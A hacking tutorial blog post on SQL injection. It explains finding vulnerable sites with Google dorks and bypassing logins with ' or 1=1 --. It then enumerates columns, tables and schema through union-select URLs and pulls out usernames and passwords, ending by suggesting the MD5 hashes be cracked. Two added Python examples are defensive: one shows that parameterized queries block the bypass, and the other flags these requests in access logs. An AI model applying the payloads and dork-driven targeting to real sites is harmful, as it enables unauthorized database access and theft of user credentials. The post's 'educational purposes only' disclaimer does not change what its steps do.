SQL injection is a technique in which the hacker inserts SQL code into a web form to get sensitive information (such as user names and passwords). In effect, it is a technique for accessing a website's database without authorization.
The SQL query looks like this in a database:
SELECT * FROM users
WHERE Login Name = $_GET['Login Name']
AND password = $_GET['password']
After entering a username and password, say admin and admin, the query becomes
HOW TO FIND A SITE VULNERABLE TO SQL INJECTION ?
Google is our friend. So, search using the following terms.
Inurl:admin login.asp
Inurl:login.asp
etc..
For a complete list of Google Hacking keywords, go here. These are famously called Google Dorks. All you need is a basic knowledge of advanced Google searching.
1. Use a known username or admin.
2. Enter the string ' or 1=1 -- into the password box.
3. Submit.
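The login query at the top of the page and the ' or 1=1 -- input, reproduced as an added example (not code from the original post) against an in-memory SQLite database; the table layout, the login_name column and the sample account are constructed for illustration. It shows the string-built query accepting that input and the same query with bound parameters rejecting it.

```python
import sqlite3

def make_db():
    """In-memory users table with one constructed account.
    The password is stored in plaintext only to mirror the page's query."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login_name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret-constructed')")
    return db

def login_concatenated(db, login_name, password):
    """Vulnerable: input is pasted into the SQL text, as in the page's query."""
    sql = ("SELECT * FROM users WHERE login_name = '" + login_name +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, login_name, password):
    """Hardened: placeholders keep input as data, never as SQL syntax."""
    sql = "SELECT * FROM users WHERE login_name = ? AND password = ?"
    return db.execute(sql, (login_name, password)).fetchone() is not None

def demo():
    """Run both login functions with a wrong password, the page's string,
    and the real password, and report which attempts are accepted."""
    db = make_db()
    payload = "' or 1=1 --"  # the string from step 2 above
    return {
        "concatenated_wrong_password": login_concatenated(db, "admin", "wrong"),
        "concatenated_payload": login_concatenated(db, "admin", payload),
        "parameterized_payload": login_parameterized(db, "admin", payload),
        "parameterized_correct": login_parameterized(db, "admin", "S3cret-constructed"),
    }

if __name__ == "__main__":
    for case, accepted in demo().items():
        print(f"{case}: {'accepted' if accepted else 'rejected'}")
```

In the concatenated version the WHERE clause ends in "or 1=1" with the trailing quote commented out, so every row matches; with placeholders the whole string is compared to the stored password as a literal value.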
If you want to find an SQLi vulnerability on a particular website, you can also use Google dorks.
To do this, add a single quote (') at the end of the URL. If you get an error or a blank page, the site is vulnerable to SQL injection.
For example, if the URL is www.examplesite.com/view.php?id=47 then it should become www.examplesite.com/view.php?id=47'
When you add a single quote at the end of the URL, some data of the page is missing. Hence we can determine that it is vulnerable to SQL injection.
FINDING OUT THE NUMBER OF COLUMNS :
We can find this by simply adding an "order by" query at the end:
www.examplesite.com/view.php?id=47 order by 1--
It should return the page with no error.
Now add one more column to the above query. It looks like
www.examplesite.com/view.php?id=47 order by 2--
We should increase the count until we get an error. When we get an error, it means that there are no more columns to return the results. Let us say we got an error at the following query.
www.examplesite.com/view.php?id=47 order by 10--
It means that the site has 9 columns.
HOW TO FIND MOST VULNERABLE COLUMN :
www.examplesite.com/view.php?id=47 union select 1,2,3,4,5,6,7,8,9--
It should return the most vulnerable columns.
Sometimes it may not display the columns on your page. In such cases add '-' (without quotes) before your id number. This is to call a non-existing page to display your data, i.e.,
WHAT ARE THE TABLES IN THE DATABASE ?
www.examplesite.com/view.php?id=-47 union select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables--
It gives us a list of tables.
Now search for the tables you are interested in. That is, a hacker generally looks for the tables that contain usernames and passwords.
So, now we have the table. What next? The columns.
HOW TO FIND OUT THE COLUMN NAMES ?
www.examplesite.com/view.php?id=-47 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name='yourtablename'--
Here, 'yourtablename' refers to the table which you selected recently.
It displays all the column names from the table.
Let us extract the data now.
www.examplesite.com/view.php?id=-47 union select 1,column_name,3,4,5,6,7,8,9 from yourtablename--
Here column_name refers to the desired column name, say usernames.
Similarly, extract the passwords by changing the column name.
Many websites encrypt the passwords using some encryption techniques like MD5 etc. So decrypt them using decryptors.
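Each request in the walk-through above leaves a recognisable trace in the web server's access log. The following added example (not part of the original post) flags those traces; the log lines are constructed, the client addresses come from documentation ranges, and the rule names are hypothetical.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Patterns taken from the requests shown on this page (rule names are made up).
RULES = [
    ("quote_probe", re.compile(r"=-?\d+'")),
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_read", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
]

# Constructed sample lines in common access-log style.
SAMPLE_LOG = '''\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /view.php?id=47 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /view.php?id=47%27 HTTP/1.1" 500 312
203.0.113.7 - - [10/Oct/2023:13:55:52 +0000] "GET /view.php?id=47+order+by+10-- HTTP/1.1" 500 312
203.0.113.7 - - [10/Oct/2023:13:56:05 +0000] "GET /view.php?id=-47+union+select+1,2,3,4,5,6,7,8,9-- HTTP/1.1" 200 5300
203.0.113.7 - - [10/Oct/2023:13:56:20 +0000] "GET /view.php?id=-47+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables-- HTTP/1.1" 200 9000
198.51.100.9 - - [10/Oct/2023:13:57:01 +0000] "GET /search.php?q=order+by+mail HTTP/1.1" 200 800
'''

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(line):
    """Return the rule names matched by the decoded query string of one log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    query = unquote_plus(urlsplit(m.group(1)).query)  # %27 -> ', + -> space
    return [name for name, rx in RULES if rx.search(query)]

def scan(log_text):
    """Map each flagged line number (1-based) to the rules it matched."""
    hits = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        matched = classify(line)
        if matched:
            hits[n] = matched
    return hits

if __name__ == "__main__":
    for n, rules in scan(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(rules)}")
```

Matches like these are triage signals for review, not a defence; the fix is still to bind user input as query parameters.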
Via : 101hacker
Note : FOR EDUCATIONAL PURPOSES ONLY. I AM NOT RESPONSIBLE FOR THE CONSEQUENCES.